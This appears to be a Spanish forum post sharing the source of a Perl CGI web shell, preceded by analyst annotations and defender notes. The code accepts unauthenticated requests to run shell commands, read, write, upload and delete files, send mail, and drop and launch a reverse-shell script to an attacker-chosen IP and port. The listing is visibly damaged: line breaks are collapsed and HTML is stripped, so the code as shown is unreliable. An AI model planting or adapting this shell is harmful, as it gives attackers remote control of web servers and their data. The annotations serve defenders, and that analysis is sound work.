Hola a todos.
Hoy he terminado de hacer una shell en CGI. Estas shells se usan en las páginas que permiten ejecutar archivos CGI y tienen el directorio cgi-bin.
Esta shell tiene las siguientes opciones:
* Listar directorios
* Ver y editar archivos
* Eliminar archivos y directorios
* ReverseShell
* Subir archivos a un directorio especificado
* Ejecutar comandos
* Enviar mails
Si lo quieren descargar desde SourceForge:
Code:
# NOTE(review): analyst annotations for this listing; the code below is left
# exactly as it appears on the page.
#
# What this is: a single-file CGI script that exposes file, command, mail and
# network functions of the hosting account to whoever can request it. No
# authentication or authorisation check is visible anywhere in the listing.
#
# Listing condition: the page extraction collapsed line breaks and stripped
# the HTML inside the print strings (hence the many `print "";`), and the
# readline operator after `@words =` is missing. As shown, everything after
# the first `#` on the first code line is a Perl comment, so this text is a
# damaged copy, not the script as originally published.
#
# Request parameters and the sink each one reaches (all copied unfiltered
# from the CGI object into %rta):
#   filex, todir       -> two-argument open() in append mode on a path built
#                         from both values; uploaded bytes are written there.
#   codefile, filecode -> unlink() of the named path, then the submitted text
#                         is written to it.
#   loadfile           -> two-argument open() on the value; the contents are
#                         printed through HTML::Entities::encode, then exit.
#   cmd                -> qx(), i.e. the value is run by the system shell and
#                         its output is returned in the response.
#   mail, to, subject, body
#                      -> Net::SMTP session to localhost; the values are
#                         concatenated into the message headers and body.
#   loadir             -> opendir()/readdir() listing of the named directory.
#   delfile, deldir    -> unlink() / rmdir() on the named path.
#   ipconnect, port    -> a second Perl script held in $code is appended to
#                         back.pl (current directory on Win32, /tmp/back.pl
#                         otherwise) and started with system(), with both
#                         values concatenated into the command string.
#   (none of the above)-> listing of the current working directory.
#
# Defender notes:
#   - Artefacts visible in the source: the banner string
#     "CGI Shell (C) Doddy Hackman 2011" in the response, and a file named
#     back.pl in /tmp or next to the script.
#   - Behaviour worth alerting on: the web-server account spawning a shell or
#     a perl child process, opening outbound TCP connections, or writing
#     files inside script directories; query strings carrying the parameter
#     names listed above (POST bodies will not show in default access logs).
#   - Hardening that removes the preconditions: disable CGI execution where
#     it is not needed, keep cgi-bin and upload directories non-writable /
#     non-executable for the web-server account, and monitor script
#     directories for new or changed files.
>#!"\xampp\perl\bin\perl.exe"##CGI Shell 0.1##(C) Doddy Hackman 2011##use CGI;use Cwd;use HTML::Entities;use Net::SMTP;my %rta;my $que = new CGI;my @ques = $que->param;for(@ques) {$rta{$_} = $que->param($_);}print "Content-type:text/html\n\n";print "CGI Shell (C) Doddy Hackman 2011CGI Shell";if ($rta{'filex'}) {open FILE ,">>".$rta{'todir'}."/".$rta{'filex'}; while($bytes = read($rta{'filex'},$todo, 1024)) {print FILE $todo;}close FILE;print "";}if ($rta{'codefile'}) {unlink($rta{'filecode'});open (FILE,">>".$rta{'filecode'});print FILE $rta{'codefile'}."\n";close FILE;print "";}if ($rta{'loadfile'}) {print "";print "
File ".$rta{'loadfile'}."
";if (-f $rta{'loadfile'}) {print "";open (FILE,$rta{'loadfile'});@words = ;close FILE;for (@words) {print HTML::Entities::encode($_);}print "
";exit(1);}}print "
Console
";if ($rta{'cmd'}) {print qx($rta{'cmd'});}elsif ($rta{'mail'}) {my $send = Net::SMTP->new("localhost",Hello => "localhost",Timeout=>10) or die("[-] Error");$send->mail($rta{'mail'});$send->to($rta{'to'}); $send->data(); $send->datasend("To:".$rta{'to'}."\n"."From:".$rta{'mail'}."\n"."Subject:".$rta{'subject'}."\n".$rta{'body'}."\n\n"); $send->dataend(); $send->quit();}elsif ($rta{'loadir'}) {if (-d $rta{'loadir'}) {opendir DIR,$rta{'loadir'};my @archivos = readdir DIR;close DIR;for(@archivos) {if (-d $_) {print "".$_."
"; } else {print $_."
";}}}}elsif (-f $rta{'delfile'}) {if (unlink($rta{'delfile'})) {print "";} else {print "";}}elsif (-d $rta{'deldir'}) {if (rmdir($rta{'deldir'})) {print "";} else {print "";}}elsif ($rta{'ipconnect'}) {$code = '#!usr/bin/perl#Reverse Shell 0.1#By Doddy Huse IO::Socket;print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";unless (@ARGV == 2) { print "[sintax] : $0 \n\n";exit(1);} else {print "[+] Starting the connection\n";print "[+] Enter in the system\n";print "[+] Enjoy !!!\n\n";conectar($ARGV[0],$ARGV[1]);tipo();}sub conectar {socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));open (STDIN,">&REVERSE");open (STDOUT,">&REVERSE");open (STDERR,">&REVERSE");}sub tipo {print "\n[*]Reverse Shell Starting...\n\n";if ($^O =~/Win32/ig) {infowin();system("cmd.exe");} else {infolinux();#root(); system("export TERM=xterm;exec sh -i");}}sub infowin {print "[+] Domain Name : ".Win32::DomainName()."\n";print "[+] OS Version : ".Win32::GetOSName()."\n";print "[+] Username : ".Win32::LoginName()."\n\n\n";}sub infolinux {print "[+] System information\n\n";system("uname -a");print "\n\n";}#The End';if ($^O =~/Win32/ig) { open (FILE,">>"."back.pl");chmod("back.pl","777");} else {open (FILE,">>"."/tmp/back.pl");chmod("/tmp/back.pl","777");}print FILE $code;close FILE;if ($^O == "MSWin32") { system("back.pl ".$rta{'ipconnect'}." ".$rta{'port'});} else {system("cd /tmp;back.pl ".$rta{'ipconnect'}." ".$rta{'port'});}} else {opendir DIR,getcwd();my @archivos = readdir DIR;close DIR;for(@archivos) {if (-d $_) {print "".$_."
"; } else {print $_."
";}}}print "
Command :
Load directory : Load File : Delete File : Delete Directory :
Upload File :
To dir :
Mailer
Mail :
To :
Subject :
Body :
ReverseShell
IP :
Port :
";# ¿ The End ?